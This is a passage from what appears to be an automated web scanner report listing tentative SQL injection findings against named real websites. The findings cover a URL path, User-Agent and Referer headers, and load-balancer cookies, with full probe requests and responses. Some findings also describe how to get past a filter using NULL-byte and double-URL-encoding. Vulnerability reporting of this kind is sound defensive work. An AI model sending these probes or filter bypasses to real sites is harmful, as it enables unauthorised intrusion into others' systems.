X-Content-Type-Options: nosniff
Date: Fri, 30 Sep 2011 13:19:07 GMT
Server: cafe
Cache-Control: private
Content-Length: 6184
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.3. http://i.glimg.net/ui/stylesheets/common.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i.glimg.net
Path:   /ui/stylesheets/common.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ui/stylesheets/common.css'%20and%201%3d1--%20?v=20110826 HTTP/1.1
Host: i.glimg.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16086
Cache-Control: private, max-age=31536000
Date: Fri, 30 Sep 2011 13:12:29 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Page Not Fou
...[SNIP]...
<div id="ctl00_ctl00_Content_PromoStripe1_BG" style="text-align:center;background-image:url(http://i.glimg.net/img/promo-bar/TT-Promo_strip-03-bg.gif);"><a href="http://www.golflink.com/golf-courses/golf-tee-times/"><img src="http://ui.glimg.net/img/promo-bar/TT-Promo_strip-03.gif" alt="" /></a></div>

       
       
       <div class="navFooter"></div>    
       <div id="ContentContainer">
           <div class="site_width">
               
               
               
               
               <div id="PageContentContainer">                
                   
<form name="aspnetForm" method="post" action="/ui/stylesheets/common.css' and 1=1-- ?v=20110826" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTk1NDUwNDE1Mw9kFgJmD2QWAmYPZBYCAgEPZBYYZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGhkAgIPFgIfAGhkAgMPFgIfAGhkAhcPZBYCZg8PFgIeBFRleHRlZGQCGA8WAh8AZ2QCGQ9kFgJmDxYCHgVzdHlsZQVidGV4dC1hbGlnbjpjZW50ZXI7YmFja2dyb3VuZC1pbWFnZTp1cmwoaHR0cDovL2kuZ2xpbWcubmV0L2ltZy9wcm9tby1iYXIvVFQtUHJvbW9fc3RyaXAtMDMtYmcuZ2lmKTtkAhoPDxYCHwBoZGQCGw8WAh8AaGQCHA8PFgIfAGhkZAIeDw8WAh8AaGRkAiIPFgIfAGhkZEZXJO7/zXpcrxALUlZ0upj7eFY7" />
</div>

   <div class="background_404">
       <div class="title_404">
           Whoops, this page is out of bounds!
       </div>
       <div class="title_404">
           404 - Page can not be found
       </div>
       <div class="subtitle_404">
           Wait, why am I here?
       </div>
       <div class="text_404">
           Welcome to a 404 page. You are here because the page you have requested doesn't exist, at least not at this location.
       </div>
       <div class="search_404">
           <input name="ctl00$ctl00$Content$Content$SearchBox" type="text" id="ctl00_ctl00_Content_Content_SearchBox" class="input" />
           <input type="submit" name="ctl00$ctl00$Content$Content$SearchSubmit" value="search" id="ctl00_ctl00_Content_Content_SearchSubmit" />
       </div>
   
       <div class="text_404">
           Did you try searching? Enter a keyword(s) in the search field above. Or, try one of the links below.
       </div>
   </div>

   <div style="width: 775px; margin: 20px auto;">
       <ul    id="QuickLinks" class="flc">
           <li><a href="/golf-courses/course-directory.aspx">Find a Course</a></li>
           <li><a hre
...[SNIP]...

Request 2

GET /ui/stylesheets/common.css'%20and%201%3d2--%20?v=20110826 HTTP/1.1
Host: i.glimg.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16169
Cache-Control: private, max-age=31536000
Date: Fri, 30 Sep 2011 13:12:29 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Page Not Fou
...[SNIP]...
<div id="ctl00_ctl00_Content_PromoStripe1_BG" style="text-align:center;background-image:url(http://i.glimg.net/img/promo-bar/promo-bar-bg.gif);"><a href="https://i.glimg.net/subscribe.aspx?h=360&amp;r=%2fui%2fstylesheets%2fcommon.css'+and+1%3d2--+%3fv%3d20110826"><img src="http://ui.glimg.net/img/promo-bar/promo-bar-signed-out.gif" alt="Sign In or Start your 14-Day Free Trial!" /></a></div>

       
       
       <div class="navFooter"></div>    
       <div id="ContentContainer">
           <div class="site_width">
               
               
               
               
               <div id="PageContentContainer">                
                   
<form name="aspnetForm" method="post" action="/ui/stylesheets/common.css' and 1=2-- ?v=20110826" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTk1NDUwNDE1Mw9kFgJmD2QWAmYPZBYCAgEPZBYYZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGhkAgIPFgIfAGhkAgMPFgIfAGhkAhcPZBYCZg8PFgIeBFRleHRlZGQCGA8WAh8AZ2QCGQ9kFgJmDxYCHgVzdHlsZQVadGV4dC1hbGlnbjpjZW50ZXI7YmFja2dyb3VuZC1pbWFnZTp1cmwoaHR0cDovL2kuZ2xpbWcubmV0L2ltZy9wcm9tby1iYXIvcHJvbW8tYmFyLWJnLmdpZik7ZAIaDw8WAh8AaGRkAhsPFgIfAGhkAhwPDxYCHwBoZGQCHg8PFgIfAGhkZAIiDxYCHwBoZGRzDKLEX13EgGVnkA0hOGWBZ8GbTw==" />
</div>

   <div class="background_404">
       <div class="title_404">
           Whoops, this page is out of bounds!
       </div>
       <div class="title_404">
           404 - Page can not be found
       </div>
       <div class="subtitle_404">
           Wait, why am I here?
       </div>
       <div class="text_404">
           Welcome to a 404 page. You are here because the page you have requested doesn't exist, at least not at this location.
       </div>
       <div class="search_404">
           <input name="ctl00$ctl00$Content$Content$SearchBox" type="text" id="ctl00_ctl00_Content_Content_SearchBox" class="input" />
           <input type="submit" name="ctl00$ctl00$Content$Content$SearchSubmit" value="search" id="ctl00_ctl00_Content_Content_SearchSubmit" />
       </div>
   
       <div class="text_404">
           Did you try searching? Enter a keyword(s) in the search field above. Or, try one of the links below.
       </div>
   </div>

   <div style="width: 775px; margin: 20px auto;">
       <ul    id="QuickLinks" class="flc">
           <li>
...[SNIP]...

1.4. http://www.myllc.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.myllc.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.myllc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=4&c2=273
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 51644
Date: Fri, 30 Sep 2011 13:24:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title id="ttlMain">Incorporate / Form Corporation Online: MyLLC.com, Inc.</title>
<meta name="verify-v1" content="Pj5FS/n4/usZ4M79S5VP+pJ7uJ
...[SNIP]...
<i>"MyLLC.com was a pleasure to do business with. The exceptional staff has amazing work ethic and helped in answering all my questions. They have terrific customer service and always got back to me immediately. I wouldn't use another company than MyLLC.com. They
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.myllc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=4&c2=273
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 51157
Date: Fri, 30 Sep 2011 13:24:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title id="ttlMain">Incorporate / Form Corporation Online: MyLLC.com, Inc.</title>
<meta name="verify-v1" content="Pj5FS/n4/usZ4M79S5VP+pJ7uJ
...[SNIP]...

1.5. http://www.myllc.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.myllc.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.myllc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=4&c2=273
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 52059
Date: Fri, 30 Sep 2011 13:23:33 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title id="ttlMain">Incorporate / Form Corporation Online: MyLLC.com, Inc.</title>
<meta name="verify-v1" content="Pj5FS/n4/usZ4M79S5VP+pJ7uJ
...[SNIP]...
<i>"MyLLC.com was a pleasure to do business with. The exceptional staff has amazing work ethic and helped in answering all my questions. They have terrific customer service and always got back to me immediately. I wouldn't use another company than MyLLC.com. They
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.myllc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=4&c2=273
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 50871
Date: Fri, 30 Sep 2011 13:23:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title id="ttlMain">Incorporate / Form Corporation Online: MyLLC.com, Inc.</title>
<meta name="verify-v1" content="Pj5FS/n4/usZ4M79S5VP+pJ7uJ
...[SNIP]...

1.6. http://www.reservetravel.com/v6 [BIGipServerimages cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The BIGipServerimages cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerimages cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:16 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000%00''

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:17 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:17 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:17 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:17 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.7. http://www.reservetravel.com/v6 [BIGipServerlinux cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The BIGipServerlinux cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerlinux cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000'; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:11 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000''; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:12 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:12 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:12 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:12 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.8. http://www.reservetravel.com/v6 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /v6?siteid=64& HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q='
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:14:09 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?siteid=64& HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:14:10 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:14:10 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:14:10 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:14:10 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 47174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>ReserveTrav
...[SNIP]...

1.9. http://www.reservetravel.com/v6 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:25 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:26 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:26 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:26 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:26 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.10. http://www.reservetravel.com/v6 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /v6?siteid=64& HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
